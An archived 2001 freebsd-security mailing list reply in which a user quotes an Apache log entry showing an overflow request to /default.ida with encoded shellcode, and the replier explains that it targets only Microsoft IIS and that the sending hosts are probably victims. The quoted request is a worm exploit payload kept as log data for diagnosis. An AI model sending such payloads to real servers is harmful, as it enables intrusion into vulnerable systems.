Date: Sun, 22 Jul 2001 07:30:59 +1000 (EST) From: Ian Smith <smithi@nimnet.asn.au> To: nathan@salvation.unixgeeks.com Cc: freebsd-security@FreeBSD.ORG Subject: Re: possible? Message-ID: <Pine.BSF.3.96.1010722072306.28730C-100000@gaia.nimnet.asn.au> In-Reply-To: <20010721204942.12010.qmail@salvation.unixgeeks.com>
next in thread | previous in thread | raw e-mail | index | archive | help
On 21 Jul 2001 nathan@salvation.unixgeeks.com wrote: > okay, today i checked my apache logs this is what i got: > > 195.10.116.2 - - [19/Jul/2001:15:50:20 -0700] "GET /default.ida?NNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN > NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN%u9090%u6858%ucbd3%u7801%u9090%u > 6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u53 > 1b%u53ff%u0078%u0000%u00=a HTTP/1.0" 400 332 > > this same exact get request came from several different address as well. such > as: 128.138.105.172, 202.157.154.126, and a couple of others. any ideas? any > remote exploits in apache i've missed? i'm running Apache/1.3.19 Server.. Unless you happen to be running Microsoft IIS as your webserver, it's just an ugly blob in the log .. we got a whole pile of them here too, from all over the planet. Don't bother chasing the IPs, they're more likely victims than villains. Ian To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message
Want to link to this message? Use this URL: <https://mail-archive.FreeBSD.org/cgi/mid.cgi?Pine.BSF.3.96.1010722072306.28730C-100000>